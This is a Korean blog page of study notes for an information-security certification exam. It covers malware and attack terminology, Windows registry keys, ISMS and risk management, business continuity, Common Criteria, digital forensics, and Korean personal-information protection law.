TDE(Transparent Data Encryption) 방식: 특정 데이터 영역을 암호화 (DBMS 내장 기능)

DB 점검

file_priv : 읽기 쓰기 권한
process_priv : 서버 프로세스, 스레드 정보 조회, 중지
shutdown_priv : 서버 종료

악성코드 분석

악성코드 유형
- dropper 유형 : 동작할 때 악성파일을 생성
- 인젝터Injecter : 드롭퍼의 특수형태. 메모리상에 악성코드 생성
분석방법
- 정적분석 : 아이다, 올리디버거 등의 도구 사용
- 동적분석 : 샌드박스에서 직접 실행
윈도우 레지스트리
- HKCR (HKEY_CLASS_ROOT) : 확장자와 연결프로그램
- HKCU (HKEY_CURRENT_USER) : 로그인중인 사용자의 설정, 프로파일
- HKLM (HKEY_LOCAL_MACHINE) : 시스템 전체 하드웨어, 응용프로그램
- HKU (HKEY_USERS) : 사용자별 키 항목, 프로파일
- HKCC (HKEY_CURRENT_CONFIG) : 윈도우 하드웨어 프로필
start=auto : 서비스 자동 실행
CurrentControlSet\Services : 제어판 서비스 의미
CommandPrompt : 마우스 우클릭
~\shell\open\command : 특정확장자파일 실행시 악성코드실행
FirewallPolicy\StandardProfile : 방화벽
AuthorizedApplication\List : 방화벽에 악성코드예외등록
Explorer\Advanced : Hidden 0 또는 2 숨김파일표시
Explorer\Advanced : ShowSuperHidden 0 보호된 운영체제 파일 숨기기
UnCheckedValue 값을 0으로 설정하면 다른 사용자들이 보호된 운영체제 파일 숨기기 옵션을 해제할수없다
암호 알고리즘 다운그레이드 툴: 프리크, 로그잼, 푸들, 드라운

용어	설명
Pass the Hash 공격	- password에 대한 hash값을 사용하는 환경에서, hash값을 획득한 후 해당 값을 사용하여 인증을 통과하는 공격 - 즉, 원격 서버나 서비스에 접속할 때 사용자의 실제 password를 모르는 상태에서 hash값을 사용하여 접속 인증을 받는 공격 기법 - 윈도우의 LM(LAN Manager) 또는 LTLM 인증 프로토콜을 사용하는 서버나 서비스의 경우 Pass the Hash 공격이 가능함 - 주로 mimikatz 툴을 이용함
Credential Stuffing	무차별 대입 공격의 일종으로 공격자가 미리 확보해 놓은 로그인 자격 증명을 다른 계정에 무작위로 대입해 사용자 계정을 탈취하는 공격 방식
Robots.txt	웹 사이트에 로봇 에이전트(agent)가 접근하여 크롤링 하는 것을 제한하기 위한 파일의 파일명
DDE(Dynamic Data Exchange)	- MS Office 프로그램에 내장된 정상기능으로 프로그램 간 데이터를 공유하기 위해 사용 - 해당 기능을 활성화 시 악용될 수 있음
DGA(Domain Generation Algorithm)	- DDoS, APT 등 공격 수행 시 공격 대상 시스템에 설치된 악성코드가 C&C와 통신하는 과정에서 특정한 규칙에 따라 도메인명을 임의로 생성하는 알고리즘 - 보안장비의 탐지를 우회하기 위한 기법
Domain Shadowing	적법한 절차로 도메인을 소유하고 있는 도메인 관리자의 개인 정보를 탈취하여, 도메인 소유자 몰래 많은 서브도메인을 등록시켜 놓고 사용하는 기법
모바일 딥링크	- 모바일 앱의 특정화면으로 바로 이동할 수 있도록 지원하는 기능 - 공격자에 의하여 악용되는 경우 앱내 민감한 개인정보(카드정보, 주소 등)가 노출될 수 있는 취약점 존재
세션 하이재킹	공격 대상이 이미 시스템에 접속되어 세션이 연결되어 있는 상태를 가로채는 공격 기법
서브도메인 하이재킹	- 클라우드 서비스 이용을 위해 서브 도메인에 CNAME 설정하여 사용 중, 서비스 이용을 중지 했지만 DNS의 CNAME 설정은 삭제하지 않아 공격자가 피싱 사이트로 악용하는 공격 - 대응방안: 미사용 도메인의 sub DNS 삭제
웹 프록시(Web Proxy)	- 웹 서버를 대신하여 자신이 마치 웹 서버인 것처럼 동작을 대행해준다. 브라우저로부터 연결 요청에 대하여 대신 응답함 - 대표 툴: paros, burp suite 등
MySQL	- my.cnf: MySQL 설정파일 - skip-networking: 설정파일 내 옵션으로, 외부 네트워크 접근 차단(로컬에서만 접근 가능)
memcached 서버	- 데이터베이스 로드를 줄여 웹 애플리케이션 속도를 높이는데 사용되는 오픈소스 분산 메모리 캐싱 시스템 - 웹 애플리케이션의 임시 데이터 저장용 메모리로 이해하기 - 최근 Github의 memcached 서버가 DDoS 공격을 받음
DB 보안 관리 방법	접근통제 추론통제 흐름통제
집성 Aggregation	낮은 보안 등급 정보조각을 조합해 높은 보안등급 정보 알아냄
추론 Inference	비보안 정보를 보고 기밀정보 유추 (통계정보 등)
권한 부여 명령어	`GRANT ~ ON ~ TO ~`
권한 회수 명령어	`REVOKE ~ ON ~ FROM ~`

=============

정보보호 관리체계(ISMS) [기무가/절수지]

정보자산의 기밀성·무결성·가용성을 보장하기 위한 절차와 과정을 체계적으로 수립, 문서화하고 지속적으로 관리·운영하는 체계
관리과정 [정범위/구사]: 정보보호 정책수립 > 범위설정 > 위험관리 > 구현 > 사후관리
- 정보보호정책 공식문서로 인증받기 위한 절차: 이해관계자 검토 > 최고경영자 승인 > 모든 임직원 및 관련자에게 이해하기 쉬운 형태로 전달 및 최신본 유지
라이프사이클
- 계획단계(Plan): 조직의 종합적인 정책과 목표에 따른 결과 산출하기 위하여 위험관리 수행하고 정보보호 개선하기 위한 정책, 목표, 프로세스, 절차를 수립
- 실행단계(Do): 보안 정책, 통제, 프로세스, 절차를 구현하고 운영
- 검토단계(Check): 보안 정책, 목표에 대한 프로세스 성과를 평가하고, 그 결과를 경영진에게 보고하여 검토
- 조치단계(Act): 관리체계 지속적 개선을 달성하기 위해 검토 결과에 근거하여 시정 및 예방조치 실시
관리체계 요구사항: 관리체계 기반 마련, 위험 관리, 관리체계 운영, 관리체계 점검 및 개선
보호대책 요구사항: 정책, 조직, 자산 관리 / 인적 보안 / 외부자 보안 /
- 물리 보안 : 보호구역 지정, 출입통제, 보호설비 운영, 반출입 기기 통제, 업무환경 보안
- 인증 및 권한관리 / 접근통제 / 암호화 적용 / 정보시스템 도입 및 개발 보안
- 시스템 및 서비스 운영관리 / 시스템 및 서비스 보안관리 / 사고 예방 및 대응 / 재해복구
기관
- 정책기관: 과학기술정보통신부, 개인정보보호위원회
- 인증기관: 한국인터넷진흥원, 금융보안원
- 인증위원회: 인증심사 결과에 대한 심의 및 의결 수행 조직ISMS-P (정보보호 및 개인정보보호 관리체계) 인증
관리체계 기반 마련, 위험관리, 관리체계 운영, 관리체계 점검 및 개선

정보보안 거버넌스

정보의 무결성, 서비스의 연속성, 정보자산의 보호를 위한 것으로 기업 거버넌스의 부분집합으로서 전략적 방향을 제시하며 목적 달성, 적절한 위험관리, 조직 자산의 책임 있는 사용, 기업 보안 프로그램의 성공과 실패가 모니터링됨을 보장하는 것
목적과 필요성
- 정보의 무결성, 서비스의 연속성, 정보 자산의 보호
- 정보보안 거버넌스는 이사회와 경영진의 책임
- 정보보호, 재해복구 등 관련 규정 준수
절차: 통제환경 > 위험평가 > 통제활동 > 정보 및 의사소통 > 실행계획수립
이해관계자
- 정보보호 최고책임자CISO : 기술적 보호 (관련 법률대응까지 포함) 업무
  - 정보보호 계획의 수립, 시행 및 개선
  - 정보보호 실태와 관행의 정기적인 감사 및 개선
  - 정보보호 위험의 식별 평가 및 정보보호 대책 마련
  - 정보보호 교육과 모의 훈련 계획의 수립 및 시행
- 개인정보 보호책임자CPO : 관리적 보호 (개인정보 보호)
- 개인정보처리자 : 업무를 목적으로 개인정보 처리 (기관, 단체 등)
- 개인정보취급자 : 실질적으로 업무를 처리하는 직원

위험관리

절차 [식분평/대계주]: 자산식별 > 위험분석(자산가치 평가, 중요도 평가, 기존 보안대책 평가, 취약성 평가) > 위험평가 > 정보보호 대책수립 > 정보보호 계획수립 > 주기적 검토
자산 관련 절차
- 자산 중요도 평가: CIA 측면에서 자산의 가치를 평가하여 중요도를 산정함으로써 정보보호의 우선순위를 결정할 수 있는 기준을 마련하기 위함
- 취약점: 공격자가 접근권한을 얻거나 악의적인 작업 수행하기 위해 악용할 수 있는 시스템 또는 응용프로그램의 약점
- 위협: 시스템이나 조직에 손실을 끼칠 수 있는 사건이나 행동
- 우려사항: 자산에 발생할 수 있는 위협과 취약성을 하나의 통합된 고려요소로 평가하도록 하고 이를 ‘우려사항’이라는 용어로 표현함
위험관리계획: 프로젝트에 대한 위험관리 활동을 어떻게 접근하고 계획할 것인지를 결정하는 프로세스, 선택된 통제 목적과 통제방안이 무엇인지와 선택한 이유 등을 문서로 정리한 것
위험분석: 자산, 위협, 취약점, 기존 보호대책 등을 분석하여 위험의 종류와 규모를 결정
- 위험분석 접근법: 베이스라인 접근법, 비정형 접근법, 상세 위험분석, 복합 접근법
- 정량적 위험분석
  - 노출계수(Exposure Factor): 자산에 대한 손실 가능성(%)
  - SLE(Single Loss Expectancy): 한번의 사건으로 발생할 수 있는 손실액, 자산가치*노출계수
  - ARO(Annual Rate of Occurrence): 연간 위험 발생 가능성(%)
  - ALE(Annual Loss Expectancy): 연간 발생 가능한 예상 손실액 계산법, SLE*ARO
  - ROI(Return Of Investment): 투자 대비 수익, 수익*100/투자금 = (ALE - 투자 비용)/투자 비용 * 100
- 정량적 위험분석 유형: 과거자료 분석법(발생가능성 예측), 수학공식법(발생빈도 계산), 확률분포법(확률적 편차), 점수법(가중치), 연간예상손실(ALE) 계산법
- 정성적 위험분석 유형: 델파이법(전문가), 시나리오법(일정조건하), 순위결정법(비교우위), 퍼지행렬법(정성적 언어)
  - 퍼지행렬법: 자산, 위협, 보안체계 등 위험분석 요인들을 정성적 언어로 표현된 값을 사용하여 기대손실을 평가하는 방법
위험평가: 위험분석 결과를 바탕으로 대응여부와 우선순위 결정
- 위험처리전략
  - 위험수용: 위험 정도가 수용 가능한 수준이라 판단하고 프로세스 유지하거나 사업 추진
  - 위험감소: 정보보호대책 효과(가치)는 보호대책 적용으로 감소한 ALE에서 대책 운영 비용을 뺀 금액으로 계산
  - 정보보호대책 효과(가치) = 감소한 ALE - 보호대책 운영 비용
  - 위험전가: 보험 가입 또는 외주 위탁
  - 위험회피: 위험이 있는 프로세스나 사업을 축소 또는 포기하는 방향으로 추진
  - DoA(Degree of Assurance) 수용 가능한 위험 수준
  - 위험대응: 위험에 대응하여 자산을 보호하기 위한 물리적, 기술적, 관리적 대응책

업무연속성계획(BCP)

정의 [재위업보]: 각종 재해, 재난으로부터 위기관리를 기반으로 업무 연속성을 보장하는 계획
단계 [범사복복수]: 범위설정 및 기획 > 사업영향평가 > 복구전략 개발 > 복구계획 수립 > 수행테스트 및 유지보수
사업영향평가(BIA) [재중영최]: 각종 재난, 재해로부터 정보시스템 중단을 가정하여 시간흐름에 따른 영향도 조사하여 복구우선순위를 정의하고, 업무를 재개하기 위한 최소 필요자원을 도출하는 절차
재난복구계획(DRP): 재해, 재난 발생시 취할 행동절차를 미리 준비하는 계획
- 재난복구서비스 종류
  - 미러사이트: 주 센터와 동일한 수준으로 백업센터 구축하고, 액티브-액티브 상태로 실시간 동시 서비스 제공, 높은 비용 발생, 대신 백업이 빠르고 데이터 최신성이 보장됨
  - 핫사이트: 동일한 수준으로 백업센터 구축하되, 액티브-스텐바이 상태로 수시간 내 가동, 데이터를 최신으로 유지
  - 웜사이트: 디스크, 주변기기 등 부분적 설비만 보유, 수일~수주 내 가동
  - 콜드사이트: 데이터만 원격지에 보관, 장소만 준비, 비용 가장 저렴하나 데이터 손실 가능, 필요한 자원 구하여 복구하는데 오랜 시간 소요

CC(Common Criteria) 인증

국가마다 서로 다른 정보보호제품 평가기준을 연동하고 평가결과를 상호 인증하기 위해 제정된 정보보안 평가기준
ISO/IEC 15408에 등록된 국제 표준 정보보호제품 평가·인증제도
정책기관(과학기술정보통신부), 인증기관(IT보안인증사무국(ITSCC)), 평가기관(KISA, TTA 등)
보안성 낮은 EAL1부터 EAL7까지 있으며, EAL0은 부적합
대표요소
- 보호프로파일(PP, Protection Profile): 보안솔루션의 기능 및 보증과 관련된 공통요구사항
- 보안목표명세서(ST, Security Target): PP에서 정의된 요구사항이 실제제품으로 평가되기 위한 기능명세서
- 평가대상(TOE, Target of Evaluation): 평가대상이 되는 제품 또는 시스템
- 평가보증등급(EAL): 보증요구와 관련된 컴포넌트의 집합으로 구성된 패키지의 일종
```
(예시) (주)강아지에서 강IDS의 CC 인증을 받을 경우
- PP: IDS제품군
- ST: (주)강아지는 IDS제품군 PP의 요구사항 만족을 위해 기능과 특징, 동작구조를 기술한 강IDS에 대한 ST 작성
- TOE: 강IDS
```디지털 포렌식 5원칙 [정재신연무]
정당성 원칙: 증거가 적법절차에 의해 수집되어야 함
재현 원칙: 같은 조건과 상황에서 항상 같은 결과가 나와야 함
신속성 원칙: 전 과정이 신속하게 진행되어야 함(휘발성 데이터 등)
연계보관성 원칙: 증거 획득부터 법정 제출까지 각 단계별 담당자 및 절차가 명확히 해야 함 (증거획득 > 이송 > 분석 > 보관 > 법정제출)
무결성 원칙: 수집된 증거가 위변조가 없어야 함위험통제 [예탐교]
예방통제: 발생가능한 잠재적인 문제들을 식별하여 사전에 대응하기 위한 통제
탐지통제: 예방통제를 우회하여 발생하는 위협을 찾아내기 위한 통제
교정통제: 탐지통제에 따라 발견한 위협에 대처하거나 줄이는 통제

용어	설명
침해사고 대응절차 [준탐초/전조보해]	사고 전 준비 과정 > 사고 탐지 > 초기 대응 > 대응전략 수립 > 사고 조사 > 보고서 작성 > 해결
사이버 위협정보 경보단계	정상 > 관심 > 주의 > 경계 > 심각
침해사고	정상적인 보호ㆍ인증 절차를 우회하여 정보통신기반시설에 접근할 수 있도록 하는 프로그램이나 기술적 장치 등을 정보통신기반시설에 설치하는 방법으로 정보통신망 또는 이와 관련된 정보시스템을 공격하는 행위
정보보호 사전점검	정보통신망의 구축 또는 정보통신서비스의 제공 이전에 계획 또는 설계 등의 과정에서 정보보호를 고려하여 필요한 조치를 하거나 계획을 마련하는 것
정보보호 시스템	정보의 수집․저장․검색․송신․수신시 정보의 유출, 위․변조, 훼손 등을 방지하기 위한 하드웨어 및 소프트웨어 일체
정보통신기반시설	국가안전보장ㆍ행정ㆍ국방ㆍ치안ㆍ금융ㆍ통신ㆍ운송ㆍ에너지 등의 업무와 관련된 전자적 제어ㆍ관리시스템
정보공유분석센터(ISAC)	- 취약점 및 침해요인, 대응방안에 관한 정보 제공하며 침해사고 발생하는 경우 실시간 경보, 분석체계 운영 - 금융, 통신 등 분야별 정보통신기반시설을 보호하기 위하여 업무 수행
접근통제의 기본원칙	입력의 신뢰성 - 직무분리 - 최소 권한 부여
위험관리 5단계	위험관리 전략 및 계약 수립 -> 위험 분석 -> 위험 평가 -> 정보보호 대책 선정 -> 정보보호 계획 수립

개인정보 법

정보보호 관련 법령

개인정보 보호법
정보통신망 이용 촉진 및 정보보호등에 관한 법률
정보통신기반 보호법: 민간, 공공 시설을 불문하고 침해사고 등이 발생할 경우 국가안정보장과 경제사회에 미치는 피해규모 및 범위가 큰 시설의 보호에 대해 다루는 법률
위치정보의 보호 및 이용 등에 관한 법률
전자서명법

정보통신기반 보호법

https://manpage.tistory.com/226

개인정보 보호법

개인정보를 수집·이용할 수 있는 경우 (목적, 기간, 항목, 불이익)

1) 정보주체의 동의
2) 법률에 특별한 규정, 법령상 의무 준수를 위해 불가피
3) 공공기관이 소관업무의 수행을 위해 불가피
4) 정보 주체와 체결한 계약 이행 및 계약과정에서 주체의 요청에 따른 이행
5) (?) 주체 및 제3자의 급박한 생명, 신체, 재산의 이익을 위해 필요하다고 인정되는 경우
6)개인정보처리자의 정당한 이익이 정보 주체의 권리보다 명백히 우선하는 경우
7) (?) 공중위생 등 공공의 안전과 안녕

개인정보 제3자 제공 (제공받는 자)

1) 주체의 동의
2) 법률에 특별한 규정, 법령상 의무 준수
3) 공공기관이 소관업무의 수행
5) 주체 및 제3자의 급박한 생명, 신체, 재산의 이익을 위해 필요하다고 인정되는 경우
6) 개인정보처리자의 정당한 이익이 정보 주체의 권리보다 명백히 우선하는 경우
7) 공중위생 등 공공의 안전과 안녕

이 때 고지해야 할 사항
1) 제공받는자
2) 제공받는자의 개인정보 이용목적
3) 제공하는 개인정보 항목
4) 제공받는자의 개인정보 보유 및 이용 기간
5) 거부권리 및 불이익 있을시 불이익 내용

목적 외 이용제공

1) 주체의 동의
2) 법률에 특별한 규정
3) 공공기관이 소관업무의 수행
5) 주체 및 제3자의 급박한 생명, 신체, 재산의 이익을 위해 필요하다고 인정되는 경우
7) 공중위생 등 공공의 안전과 안녕

위탁하는 업무의 내용과 위탁받아 처리하는자(수탁자)를 알리는 방법

1) 인터넷 홈페이지에 지속적으로 게재
2) 사업장 등의 보기 쉬운 장소에 게시
3) 같은 제목으로 연 2회이상 발행해 정보주체에게 배포하는 간행물, 홍보지, 청구서 등에 지속해서 싣는 방법

서비스 홍보나 판매 등 마케팅 목적은 서면 등으로 알려야 함

개인정보 처리방침

포함 항목
- 개인정보 처리 목적, 처리하려는 개인정보 항목, 처리 및 보유기간
- 개인정보의 파기절차 및 파기방법
- (해당되는 경우)위탁에 관한 사항, 제3자 제공에 관한 사항
- 정보주체의 권리, 의무, 행사방법에 관한 사항
- 개인정보 보호책임자 성명 또는 개인정보 보호업무를 하는 부서명, 연락처
- 개인정보의 안전성 확보조치에 관한 사항
- 인터넷 접속정보파일 등 개인정보를 자동으로 수집하는 장치의 설치, 운영, 거부에 관한 사항
게재 방법
- 인터넷 홈페이지에 지속적으로 게재
- 사업장 등 보기 쉬운 장소에 게시
- 같은 제목으로 연 2회이상 발행해 정보주체에게 배포하는 간행물, 홍보지, 청구서 등에 지속해서 싣는 방법
- 재화나 용역 제공하기 위하여 개인정보처리자와 정보주체가 작성한 계약서 등에 실어 정보주체에게 발급

개인정보 기술적, 관리적 보호조치 기준

개인정보취급자 비밀번호 작성규칙
- 비밀번호 복잡도 및 길이 충족(영문, 숫자, 특수 문자 중 2종류 이상 조합 시 10자리 이상, 3종류 이상 조합 시 8자리 이상의 길이로 구성)
- 유추하기 어려운 비밀번호 사용(연속적인 숫자나 생일, 전화번호 등 추측하기 쉬운 것은 사용하지 않기)
- 비밀번호 최대 사용기간 설정(반기별로 변경)
개인정보처리시스템 접속기록: 개인정보취급자의 계정, 접속일시, 접속장소, 수행업무 등(+ 처리한 정보주체 정보)

기타

가명정보처리 (동의없이) - 통계작성, 과학적 연구, 공익적 기록 보존
개인정보 영향평가PIA
- 공공기관만 해당
- 5만명 이상의 정보주체에 관한 민감정보 또는 고유식별정보의 처리
- 연계 결과 50만명 이상의 정보주체에 관한 개인정보
- 100만명 이상의 정보주체
- 개인정보파일의 운용체계를 변경하려는 경우
지체없이 = 72시간 이내
유출통지 항목
1) 유출된 개인정보의 항목
2) 유출된 시점과 경위
3) 정보주체가 할 수 있는 피해 최소화 방법
4) 개인정보처리자의 대응조치 및 피해 구제절차
5) 정보주체에게 피해가 발생한 경우 신고등을 접수할 수 있는 담당부서 및 연락처
민감정보, 고유식별정보, 1천명이상 등은 개인정보보호위원회 또는 한국인터넷진흥원에 신고해야함

제20조) 정보주체 이외로부터 수집한 개인정보의 수집 출처 고지

1) 수집 출처
2) 처리 목적
3) 처리 정지를 요구하거나 동의를 철회할 권리가 있다는 사실

제20조의2) 일정 기준 이상의 개인정보처리자는 수집한 개인정보의 이용·제공 내역이나 이용·제공 내역을 확인할 수 있는 정보시스템에 접속하는 방법을 주기적으로 정보주체에게 통지해야한다.

1) 통지의무 대상 : 5만명 이상의 정보 주체에 대해 민감정보 또는 고유식별정보를 처리하는 자, 100만명 이상의 정보주체에 대한 개인정보를 처리하는 자
2) 통지해야하는 정보 : 개인정보의 수집·이용 목적, 수집 항목, 제공받은 제3자, 제공목적, 제공항목

제23조/제24조) 민감정보/고유식별정보의 처리 제한

1) 민감정보 및 고유식별정보는 원칙적으로 처리를 금지한다.
2) 다음의 경우만 가능

정보주체에게 다른 개인정보의 처리에 대한 동의와 별도로 동의를 받은경우
법령에서 구체적으로 처리를 요구하거나 허용하는 경우
위 법령에도 불구하고 주민번호응 법률, 법령에서 구체적인 처리 근거가 있어야 처리할 수 있음.

제24조의2) 주민등록번호 처리의 제한

1) 주민등록번호는 정보주체의 별도 동의를 받아도 처리가 불가
2) 다음의 경우만 가능

법령 및 법률에서 구체적으로 주민등록번호의 처리를 요구하거나 허용하는 경우
정보주체 또는 제3자의 생명, 신체, 재산의 이익을 위해 명백히 필요하다고 인정되는 경우
보호위원회가 고시로 정하는 경우

제25조) 고정형 영상정보처리기기의 설치·운영 제한

1) 고정형 영상정보 처리기기 설치 ·운영이 가능한경우

법령
범죄의 예방 및 수사
시설의 안전 및 관리, 화재 예방
교통단속
교통정보의 수집·분석 및 제공
촬영된 영상정보를 저장하지 아니하는 경우로 대통령령으로 정하는 경우
(출입자 수, 성별, 연령대 등 통계값 또는 특성값 산출을 위해 촬영된 영상정보를 일시적으로 처리하는 경우)
3) 다음사항이 포함된 영상정보처리기기 안내판 설치 필요
설치 목적 및 장소
촬영 범위 및 시간
관리책임자의 연락

제28조의2) 가명정보의 처리 등

1) 개인정보처리자는 통계작성, 과학적 연구, 공익적 기록 보존 등을 위하여 정보주체의 동의없이 가명정보를 처리할 수 있다.

제33조) 개인정보 영향평가(공공기관만 해당)

구축/운용/변경하려는 개인정보 파일로서 5만명이상의 정보주체에 대한 민감정보 또는 고유식별정보
구축/운용하고 있는 개인정보 파일을 공공기관 내/외부에서 구축/운용하고 있는 파일과 연계하려는 경우로, 연계결과 50만명 이상의 정보주체에 관련 개인정보
구축/운용/변경하려는개인정보 파일로서 100만명이상의 정보주체에 관한 개인정보 파일
개인정보영향평가를 받고 개인정보파일의 운용체계를 변경하려는 경우(변경된 부분으로 한정)

제34조) 개인정보 유출 등의 통지·신고

2) 인지했을 때 지체없이(72시간 내) 정보주체에게 관련 사실을 통지하고 전문기관에 신고등의 조치를 해야한다.
3) 유출 통지 방법

1건이라도 유출되었음을 알게되었을 때 주체에게 통지
72시간 내
개별 통지(서면, 전자우편, 전화, 팩스, 문자전송 등), 연락처를 알 수 없는 경우에는 홈페이지에 30일 이상 공개
통지내용 : 유출된 개인정보 항목, 유출 시점과 경위, 피해 최소화 방법, 개인정보처리자의 대응조치 및 피해구제절차, 피해가 발생한 경우 신고.접수할수 있는 담당부서 및 연락처
4) 개인정보 유출 신고 방법
1천명이상의 개인정보
민감정보 또는 고유식별정보가 유출된 경우
외부로부터 불법적인 접근
개인정보보호위원회 또는 KISA
지체없이 신고(72시간내)
#####개인정보 안전성 확보조치
개정에 따른 고치 통합
2) 개인정보 처리 현실을 반영하여 합리적으로 개선
구체적인 비밀번호 작성 규식을 삭제 > 다양한ㄴ 인증수단을 안전하게 적용하는 방법으로 자율적으로 정하도록함
정당한 사유가 있는 경우 사용자 계정 공유 허용 및 개인정보보호에 필요한 프로그램(보안패치)의 업데이트 지연 허용
클라우드컴퓨팅서비스를 이용하여 개인정보처리시스템을 구성/운영하는 경우, 해당 서비스에 대한 접속외에는 인터넷 차단 조치 허용
블록체인등 기술적 특성으로 영구삭제가 어려운 경우 익명정보로 처리를 파기 방법으로 허용

제2조/8조) 접속기록은 식별자, 접속일시, 접속지정보, 처리한 정보주체 정보, 수행업무

1) 1년이상 보관
2) 2년이상

5만명 이상의 정보주체에 관한 개인정보 처리시스템
고유식별정보 또느 ㄴ민감정보를 처리하는 개인정보처리시스템 접속기록
기간통신사업자

제5조) 접근 권한 이력은 최소 3년간 보관해야한다
제6조) 개인정보취급자의 컴퓨터등에 대한 인터넷망 차단 (망분리조치)

대상: 전년도 말 기준 직전 3개월간 이용자수가 일평균 100만명 이상
개인정보를 다운로드/파기/접근권한을 설정할 수 있는 컴퓨터
예외 : 클라우드컴퓨팅서비스를 이용하여 개정처를 운영하는 경우, 해당 서비스에 대한 접속 외 인터넷을 차단

728x90

lazyTitan

고정 헤더 영역

메뉴 레이어

메뉴 리스트

검색 레이어

검색 영역

상세 컨텐츠

본문 제목

본문